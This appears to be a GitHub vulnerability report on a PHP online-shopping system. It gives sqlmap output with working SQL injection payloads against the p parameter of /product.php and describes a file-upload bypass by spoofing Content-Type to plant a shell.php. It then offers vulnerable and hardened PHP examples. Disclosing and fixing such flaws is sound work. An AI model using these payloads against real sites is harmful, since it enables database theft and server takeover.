SQL Injection & affected by Arbitrary File Upload
LoveCppp opened this issue · 0 comments
LoveCppp commented
SQL Injection
The online-shopping-system is vulnerable to unauthenticated error/boolean-based blind & error-based SQL Injection attacks.
The p parameter on the /product.php page does not sanitize the user input, so an attacker can extract sensitive data from the underlying MySQL database.
PoCs
SQLMAP PAYLOADS
p parameter on the /product.php page
GET parameter 'p' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: p (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: p=72 AND 2037=2037

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: p=72 AND (SELECT 1432 FROM(SELECT COUNT(*),CONCAT(0x7178707671,(SELECT (ELT(1432=1432,1))),0x716b6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: p=72 AND (SELECT 2289 FROM (SELECT(SLEEP(5)))LMdY)

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: p=72 UNION ALL SELECT CONCAT(0x7178707671,0x4b71516d647848537741636571634e5a416a6a7a716367744d47654778554952467778625161716f,0x716b6a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[20:26:43] [INFO] the back-end DBMS is MySQL
web application technology: Nginx 1.15.11, PHP, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
Affected by Arbitrary File Upload
Affected by Arbitrary File Upload at add_products line 22. Only the Content-Type is verified, so one can modify Content-Type to:
image/jpeg
The file path is ../product_images/1635249699_shell.php
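The two defects reported above, each shown as the weak pattern beside a hardened form. This is an added illustration and not the project's own code: the table and column names, the handler layout, and PHP 7.1+ are assumed.

```php
<?php
// Added example, not the project's code. Table/column names and the
// handler layout are assumed for illustration; requires PHP 7.1+.

// --- product.php: weak pattern (query built from the raw p parameter) ---
function product_lookup_vulnerable(mysqli $db, string $p): ?array {
    // $p comes straight from $_GET['p']; "72 AND 2037=2037" rewrites the WHERE clause.
    $res = $db->query("SELECT * FROM products WHERE product_id = $p");
    return $res ? ($res->fetch_assoc() ?: null) : null;
}

// --- product.php: hardened (integer check + prepared statement) ---
function product_lookup_safe(mysqli $db, string $p): ?array {
    if (!ctype_digit($p)) {            // reject anything that is not a plain integer id
        return null;
    }
    $id = (int) $p;
    $stmt = $db->prepare("SELECT * FROM products WHERE product_id = ?");
    $stmt->bind_param("i", $id);       // value travels separately from the SQL text
    $stmt->execute();
    return $stmt->get_result()->fetch_assoc() ?: null;
}

// --- add_products: weak pattern (trusts the client-supplied Content-Type) ---
function store_image_vulnerable(array $file, string $dir): ?string {
    if ($file['type'] !== 'image/jpeg') { // $_FILES[...]['type'] is set by the client
        return null;
    }
    $dest = $dir . '/' . time() . '_' . $file['name']; // client's extension kept, e.g. .php
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}

// --- add_products: hardened (server-side sniffing, fixed extension, random name) ---
function store_image_safe(array $file, string $dir): ?string {
    $allowed = ['image/jpeg' => 'jpg', 'image/png' => 'png'];
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Determine the MIME type from the file bytes, not from the request header.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if (!isset($allowed[$mime]) || getimagesize($file['tmp_name']) === false) {
        return null;
    }
    // The server chooses both name and extension; nothing client-controlled survives.
    $dest = rtrim($dir, '/') . '/' . bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    return move_uploaded_file($file['tmp_name'], $dest) ? $dest : null;
}
```

Since the reported stack serves PHP through Nginx, the product_images directory should also be served as static content only, with no location passing files under it to the PHP FastCGI backend.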